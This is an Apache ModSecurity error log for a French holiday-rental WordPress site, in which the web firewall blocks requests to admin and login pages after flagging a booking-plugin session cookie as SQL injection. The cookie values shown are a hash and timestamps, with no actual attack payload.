[Mon May 11 22:31:32.012014 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8o6FW67LJTsgN3jQNtgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:33.160364 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8paFW67LJTsgN3jQNtwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:33.160764 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8paFW67LJTsgN3jQNtwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:33.773577 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8paFW67LJTsgN3jQNtwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:34.819946 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8pqFW67LJTsgN3jQNuQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:34.820244 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8pqFW67LJTsgN3jQNuQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:35.382452 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8pqFW67LJTsgN3jQNuQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:36.750660 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8qKFW67LJTsgN3jQNugAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:36.750953 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8qKFW67LJTsgN3jQNugAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:37.350452 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8qKFW67LJTsgN3jQNugAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:37.528833 2026] [security2:error] [pid 1588898:tid 1588922] [client 114.119.141.34:54139] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: 3523ebeb63879de6c19584503117eef4||1778533293||1778532933"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/louer-mobil-home/"] [unique_id "agI8qaFW67LJTsgN3jQNuwAAABg"], referer: https://rentparadise.fr/accommodation-facility/table-jardin
[Mon May 11 22:31:37.529063 2026] [security2:error] [pid 1588898:tid 1588922] [client 114.119.141.34:54139] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/louer-mobil-home/"] [unique_id "agI8qaFW67LJTsgN3jQNuwAAABg"], referer: https://rentparadise.fr/accommodation-facility/table-jardin
[Mon May 11 22:31:37.739199 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8qaFW67LJTsgN3jQNvAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:37.739642 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8qaFW67LJTsgN3jQNvAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:38.099103 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8qaFW67LJTsgN3jQNvAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:38.301059 2026] [security2:error] [pid 1588898:tid 1588922] [client 114.119.141.34:54139] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8qaFW67LJTsgN3jQNuwAAABg"], referer: https://rentparadise.fr/accommodation-facility/table-jardin
[Mon May 11 22:31:40.349475 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8rKFW67LJTsgN3jQNvQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:40.349756 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8rKFW67LJTsgN3jQNvQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:40.955125 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8rKFW67LJTsgN3jQNvQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:41.536384 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8raFW67LJTsgN3jQNvwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:41.536660 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8raFW67LJTsgN3jQNvwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:42.131172 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8raFW67LJTsgN3jQNvwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:42.739009 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8rqFW67LJTsgN3jQNwAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:42.739302 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8rqFW67LJTsgN3jQNwAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:43.351616 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8rqFW67LJTsgN3jQNwAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:43.938664 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8r6FW67LJTsgN3jQNwQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:43.939122 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8r6FW67LJTsgN3jQNwQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:44.479825 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8r6FW67LJTsgN3jQNwQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:45.538866 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8saFW67LJTsgN3jQNwwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:45.539177 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8saFW67LJTsgN3jQNwwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:46.107935 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8saFW67LJTsgN3jQNwwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:47.542355 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8s6FW67LJTsgN3jQNxQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:47.542644 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8s6FW67LJTsgN3jQNxQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:47.899765 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8s6FW67LJTsgN3jQNxQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:49.340379 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8taFW67LJTsgN3jQNxgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:49.340797 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8taFW67LJTsgN3jQNxgAAABU"], referer: https://rentparadise.fr/wp-login.php
